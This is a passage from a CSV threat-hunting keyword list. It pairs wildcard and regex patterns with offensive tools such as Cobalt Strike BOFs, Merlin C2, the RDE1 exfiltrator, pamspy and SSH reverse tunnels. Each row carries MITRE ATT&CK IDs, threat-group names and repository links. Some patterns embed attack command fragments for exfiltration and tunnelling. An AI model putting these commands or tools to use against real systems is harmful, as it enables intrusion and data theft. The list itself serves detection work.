a simple Command and Control (C2) 
program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","60096" "*src/Remote/chromeKey/*",".{0,1000}src\/Remote\/chromeKey\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60097" "*src/Remote/lastpass/*",".{0,1000}src\/Remote\/lastpass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60098" "*src/Remote/sc_config/*",".{0,1000}src\/Remote\/sc_config\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60099" "*src/Remote/sc_create/*",".{0,1000}src\/Remote\/sc_create\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60100" "*src/Remote/sc_delete/*",".{0,1000}src\/Remote\/sc_delete\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60101" "*src/Remote/sc_start/*",".{0,1000}src\/Remote\/sc_start\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - 
Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60102" "*src/ShellGhost.c*",".{0,1000}src\/ShellGhost\.c.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","60103" "*Src/Spray-AD*",".{0,1000}Src\/Spray\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - 
APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","60104" "*src/tests/NESSIE/*",".{0,1000}src\/tests\/NESSIE\/.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60105" "*src/zerologon.c*",".{0,1000}src\/zerologon\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","N/A","10","10","158","37","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z","60107" "*src\CMLootOut\*",".{0,1000}src\\CMLootOut\\.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","60108" "*src\pamspy.c*",".{0,1000}src\\pamspy\.c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","60109" "*src\unhook.c*",".{0,1000}src\\unhook\.c.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 
- T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","60110" "*src\unhook.c*",".{0,1000}src\\unhook\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - 
Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/unhook-bof","1","0","N/A","N/A","10","10","268","59","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z","60111" "*srde dns -*",".{0,1000}srde\sdns\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","60113" "*srde https -*",".{0,1000}srde\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","60114" "*srde_release dns -k *",".{0,1000}srde_release\sdns\s\-k\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","60115" "*srde_release https -i *",".{0,1000}srde_release\shttps\s\-i\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","60116" "*srv.(MerlinServer).Exe*",".{0,1000}srv\.\(MerlinServer\)\.Exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","60117" "*srvsvc_##*",".{0,1000}srvsvc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 
RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","60118" "*ss -tunlp || netstat -tunlp*127.0.0.1*",".{0,1000}ss\s\-tunlp\s\|\|\snetstat\s\-tunlp.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","60119" "*sse-secure-systems/TeamsEnum*",".{0,1000}sse\-secure\-systems\/TeamsEnum.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","1","N/A","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","60121" "*ssf.exe -D * -p * 127.0.0.1*",".{0,1000}ssf\.exe\s\-D\s.{0,1000}\s\-p\s.{0,1000}\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","N/A","10","10","1622","238","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z","60122" "*ssfd.exe -p *",".{0,1000}ssfd\.exe\s\-p\s.{0,1000}","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration 
purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","N/A","10","10","1622","238","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z","60123" "*ssh -L *:localhost:80 -N imgs.sh*",".{0,1000}ssh\s\-L\s.{0,1000}\:localhost\:80\s\-N\simgs\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","60130" "*ssh -N -R 4567:localhost:*root*",".{0,1000}ssh\s\-N\s\-R\s4567\:localhost\:.{0,1000}root.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","60131" "*ssh -o ProxyCommand=""wstunnel*",".{0,1000}ssh\s\-o\sProxyCommand\=\""wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","60134" "*ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R *serveo.net*",".{0,1000}ssh\s\-o\sStrictHostKeyChecking\=no\s\-o\sServerAliveInterval\=60\s\-R\s.{0,1000}serveo\.net.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","0","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","60135" "*ssh -p 2222 -R *:80:localhost:8080 
tuns.sh*",".{0,1000}ssh\s\-p\s2222\s\-R\s.{0,1000}\:80\:localhost\:8080\stuns\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","60136" "*ssh -p 2222 -R 80:localhost:8080 tuns.sh*",".{0,1000}ssh\s\-p\s2222\s\-R\s80\:localhost\:8080\stuns\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","60137" "*ssh -p 2222 